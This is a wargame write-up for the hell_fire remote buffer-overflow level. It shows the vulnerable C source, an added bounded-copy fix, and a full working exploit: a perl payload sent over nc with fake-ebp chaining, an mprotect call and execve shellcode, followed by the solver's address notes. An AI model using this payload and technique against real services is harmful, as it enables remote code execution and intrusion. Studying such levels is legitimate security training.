int $0x80

dark_eyes -> hell_fire

cd80 cd80 2013.10.10 21:48

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>
#include <string.h> /* added here: declares memcpy/strcpy (not in the pasted listing) */

int main()
{
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);

 // give me a food: reads up to 1023 bytes into temp
 fgets(temp, 1024, stdin);
  
 // save sfp (the saved frame pointer sitting 264 bytes above buffer)
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!! unbounded copy of temp into the 256-byte buffer
 strcpy(buffer, temp);

 // restore sfp after the copy
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);
} /* closing brace missing from the pasted listing */

This is the source.
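The defect is that fgets() accepts up to 1023 bytes into temp while strcpy() copies them unchecked into the 256-byte buffer; saving and restoring the saved frame pointer afterwards only protects those four bytes, which is why the hint points at the other things reachable from the overflow. The bounded variant below is an added example (it is not the level's source and not code from the original post); the names safe_copy, would_overflow and overflows_at_length are its own. It copies with an explicit size, always NUL-terminates, and reports truncation instead of writing past the buffer, so the sfp save/restore trick is not needed at all.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256
#define TEMP_SIZE 1024

/* Bounded replacement for strcpy(buffer, temp): copies at most dst_size-1
 * bytes of src (dropping the newline fgets leaves in place) and always
 * NUL-terminates. Returns the number of bytes stored, or -1 if the input
 * had to be truncated to fit. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    int truncated = 0;

    if (len > 0 && src[len - 1] == '\n')
        len--;                      /* strip trailing newline */
    if (len >= dst_size) {          /* would not fit with its NUL */
        len = dst_size - 1;
        truncated = 1;
    }
    memcpy(dst, src, len);
    dst[len] = '\0';
    return truncated ? -1 : (int)len;
}

/* Returns 1 if a line read by fgets() does not fit in a BUF_SIZE buffer,
 * i.e. if the bounded copy had to truncate it, 0 otherwise. */
int would_overflow(const char *line)
{
    char buffer[BUF_SIZE];
    return safe_copy(buffer, sizeof buffer, line) < 0;
}

/* Builds a constructed input line of n 'A' bytes plus newline (as fgets
 * would deliver it) and reports whether it fits. Used to probe the
 * boundary around BUF_SIZE without any external input. */
int overflows_at_length(size_t n)
{
    char line[TEMP_SIZE];

    if (n > sizeof line - 2)
        n = sizeof line - 2;
    memset(line, 'A', n);
    line[n] = '\n';
    line[n + 1] = '\0';
    return would_overflow(line);
}

/* Stand-alone driver mirroring hell_fire's prompt. */
int main(void)
{
    char buffer[BUF_SIZE];
    char temp[TEMP_SIZE];

    printf("hell_fire : What's this smell?\n");
    printf("you : ");
    fflush(stdout);

    if (fgets(temp, sizeof temp, stdin) == NULL)
        return 1;
    if (safe_copy(buffer, sizeof buffer, temp) < 0)
        fprintf(stderr, "input truncated to %d bytes\n", BUF_SIZE - 1);
    printf("%s\n", buffer);
    return 0;
}
```

Compared with the original, the only change in behaviour is that a line longer than 255 characters is cut short and reported rather than spilling over saved_sfp, the saved return address and the rest of the frame.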

Because it uses fgets, I did a fake ebp into stdin, gave rwx permission with mprotect, and ran the shellcode.

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

Below are the notes I took while solving it.

 

fake ebp to stdin+500

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);